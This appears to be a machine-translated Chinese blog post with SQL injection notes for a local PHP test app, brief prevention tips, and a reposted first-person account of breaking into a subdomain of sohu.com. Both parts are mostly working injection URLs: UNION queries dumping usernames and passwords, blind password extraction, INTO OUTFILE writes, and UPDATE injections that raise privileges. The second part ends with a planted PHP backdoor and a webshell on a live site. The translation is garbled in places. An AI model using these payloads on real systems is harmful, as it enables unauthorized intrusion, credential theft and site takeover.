PHP's SQL injection process Analysis _php skills

Today I learned the basics about SQL injection from the Internet. The focus of SQL injection is to construct SQL statements, with the flexibility to use SQL
Statement to construct the injection string for the cow ratio. After learning to write a few notes, ready to use. I hope you're looking at the following content first.
The rationale for solving SQL. The code in your notes comes from the network.
　 = = = Base Part = = =
This table queries:
Http://127.0.0.1/injection/user.php?username=angel ' and LENGTH (password) = ' 6
Http://127.0.0.1/injection/user.php?username=angel ' and Left (password,1) = ' m
Union UNION statement:
Http://127.0.0.1/injection/show.php?id=1 ' Union select 1,username,password from user/*
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user/*
Export File:
Http://127.0.0.1/injection/user.php?username=angel ' into outfile ' c:/file.txt
Http://127.0.0.1/injection/user.php?username= ' or 1=1 into outfile ' C:/file.txt
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user into outfile ' c:/user.txt
　　 INSERT statement:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Construction Homepage Value: Http://4ngel.net ', ' 3 ') #
The SQL statement becomes: INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');
　　 UPDATE statement: I like this one.
Understand this SQL first
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' $id '
If this SQL is modified to the following form, the injection is implemented
1: Modify the homepage value to
Http://4ngel.net ', userlevel= ' 3
The SQL statement then becomes
UPDATE user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' WHERE id= ' $id '
Userlevel for User Level
2: Modify the password value to
Mypass) ' WHERE username= ' admin ' #
The SQL statement then becomes
UPDATE user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '
3: Modify ID value to
' OR username= ' admin '
The SQL statement then becomes
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' OR username= ' admin '
　 = = = Advanced Part = = =
Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()
......
function application
UPDATE article SET title=database () WHERE id=1
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,database (), version ()
SELECT * from user WHERE Username=char (97,110,103,101,108)
# char (97,110,103,101,108) is equivalent to Angel, decimal
Http://127.0.0.1/injection/user.php?userid=1 and Password=char (109,121,112,97,115,115) http://127.0.0.1/injection /user.php?userid=1 and Left (password,1) >char (100)
Http://127.0.0.1/injection/user.php?userid=1 and Ord (Mid (password,3,1)) >111
Determine the number and type of fields in a data structure
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1
Http://127.0.0.1/injection/show.php?id=-1 Union Select char (), char (), char (97)
Guess data table name
Http://127.0.0.1/injection/show.php?id=-1 Union select 1,1,1 from members
Cross-table queries get user names and passwords
http://127.0.0.1/ymdown/show.php?id=10000 Union Select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
Other
#验证第一位密码
HTTP://127.0.0.1/YMDOWN/SHOW.PHP?ID=10 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and Ord (Mid (password,1,1)) =49
= = = Injection Prevention = =
Server aspects
MAGIC_QUOTES_GPC set to On
Display_errors set to Off
Coding aspects
$keywords = Addslashes ($keywords);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
Numeric type
Use Intval () to catch
String type
To add a single quote in an SQL statement parameter
The following code, used to prevent injection
if (GET_MAGIC_QUOTES_GPC ()) {
//....
}else{
$str = mysql_real_escape_string ($STR);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
}
Useful functions
Stripslashes ()
GET_MAGIC_QUOTES_GPC ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
Reference articles:
Http://www.4ngel.net/article/36.htm (SQL injection with MySQL) Chinese
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)
A safety test for sohu.com
has been posted on the hacker line.
Posted in Http://www.loveshell.net
Sohu.com is a relatively large portal site in the country, providing many services including mailboxes. Such a large site, no problem is difficult, as the saying goes, the more the more unsafe! Whether for the server or the site is the truth, the recent study of MySQL injection, so by the way on the sohu.com did a small security check to see that it does not exist SQL injection vulnerabilities.
Look at Sohu.com's main station found almost all static, so gave up the idea of finding problems in the main station. Directly in the sohu.com of the various points of view after browsing a circle, most of the sites are using PHP script, there are a few use JSP script, according to experience we know that the PHP system, the general background database are MySQL, as if the ASP corresponds to MSSQL, There seems to be a lot of problems in the area. Because of PHP's characteristics (PHP by default will be passed in the parameters of the ' and other characters in the conversion, so for the character type of the variable by default is difficult to inject), in general, we inject only the number of variables. According to the usual injection of knowledge, we know that id=xxx such form of the parameters are generally the number of variables, so we just go to test those php?id=xxx connection may find a loophole! Through a careful search, It really made me find a problem connection on the XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86
Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
Return to normal as shown in Figure 1.
Then submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
Return no information like Figure 2, empty bar, should be the result of the SQL statement is empty.
With these two URLs we can guess that the vulnerabilities exist because the and 1=1 and 1=2 we submit are executed as SQL statements! So the other statements we submit are also executable, which is SQL injection! We can also know that the ID variable is treated as a number and is not placed in the "Between, otherwise we cannot succeed!" If the variable does not filter the SQL other keywords, we are likely to succeed! I met a lot of things are variable filter select, in MySQL is dead end, good depressed!
Now that the loophole is there, let's go on! The first of course is to probe the type of database and the account that connects the database! High privilege and database and web-like machine words can exempt guessing fields from the pain! Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and Ord (Mid (Version (), 1,1)) >51/*
Return to normal as shown in Figure 3, this statement is to see the version of the database is not higher than 3, because 3 of the ASCII is 51! Version of the first character is greater than 51 of course is more than 4.0! More than 4.0 is to support the union query, so that you can avoid a guess of the pain Oh! Here it turns out to be true, So the database is more than 4.0 oh, can support the union.
Since the support of the union query first of all the fields of this statement to burst out bar! Later, we'll use union to inquire what is very fast! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 10/*
Return to normal as shown in Figure 4, it appears that the field is greater than 10, continue to submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 20/*
Normal return, submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 30/*
......
By 50 when the order returned no information! appears to be greater than 40 of less than 50, and then commits:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 45/*
......
Finally guessed that the field is about 41! This is because some of the fields are not sorted, so we also need to use Union to accurately locate the field number is 41, submitted:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 /*
Return the results as shown in Figure 5, haha, success Oh! Which fields will be displayed on the page is also clear! Now let's move on! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
Return the results as shown in Figure 6, complete the database system detection Oh! We are probably not root, and the database server and Web are probably not on a single server, so we don't have file permissions! Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and (select COUNT (*) from Mysql.user) >0/*
Return results like Figure 7, there is no read access to MySQL, more certain permissions is not root!
Since it is not root, do not be discouraged, let us continue! In further guessing the data before we had better find the background first, many times found the administrator password but can not find a place to land, very depressed said! In the root directory plus/admin and/manage/and so on the background commonly used addresses are returned 404 error, Guess a few times finally in the/book/directory admin when the 403 forbiden error, haha, there is this directory! But the landing page anyway also guess not to come out, depressed in! But since you know there is a admin or say, go to Google search:
Admin site:sohu.com
As shown in Figure 8, got another point of the forum, we know that people are very lazy, usually a local background features are probably the characteristics of the entire site, so when I try to visit the/book/admin/admuser.php Miracle appeared, such as Figure 9, Haha, from the success of more near Oh! Here we know the background of the site, in fact, we can also get very important information, see the original file to find the name of the landing form is name and password, it is easy to infer the other side of the administrator table structure, even if not in line with the estimate is similar, hehe! So you know why we have to guess backstage first! Go ahead and inject it! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
Returns an error stating that there is no admin for this table, try admins and admin_user, and so on, and finally submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
Time to return to success, haha! There is user this table! What about the admin table? continue to submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,name, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*
Error returning empty information, submitting:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*
Return the results as shown in Figure 10, haha normal return and out of a password, should be the first user password in the admin table! Then what is his user name? Guess many fields are returned errors, there is no way to enter an ID, incredibly return success! ID is the name of the administrator Oh! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password,3,4,id, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
Return the results as shown in Figure 11, haha, get the name of the administrator Oh! Excited to take the administrator name and password to the backstage landing success Oh! As shown in Figure 12. Now is to think about how to take Webshell time, in the background found that there are upload pictures, but when uploading php file when prompted to say is not a picture file, depressed! In the background of a careful messy turn over will, found a PHP file to create the function, so in the inside inserted a word of PHP back door , as shown in Figure 13, after the point generated prompt success, it seems that if there is no filtration we should be Webshell, the password is a, with a word of the back door connected to the figure 14, haha, success! Script detection to this successful completion!
After getting Webshell I looked on the server, found that the security of the server is done well, do not execute the command, and basically all the directories except the directory we just uploaded are not writable, but as a script test, get Webshell also even if successful! It can also be seen that A small parameter without filtering can lead to the fall of the site, especially such as sohu.com, more parameters, more attention should be paid to filter the problem Oh!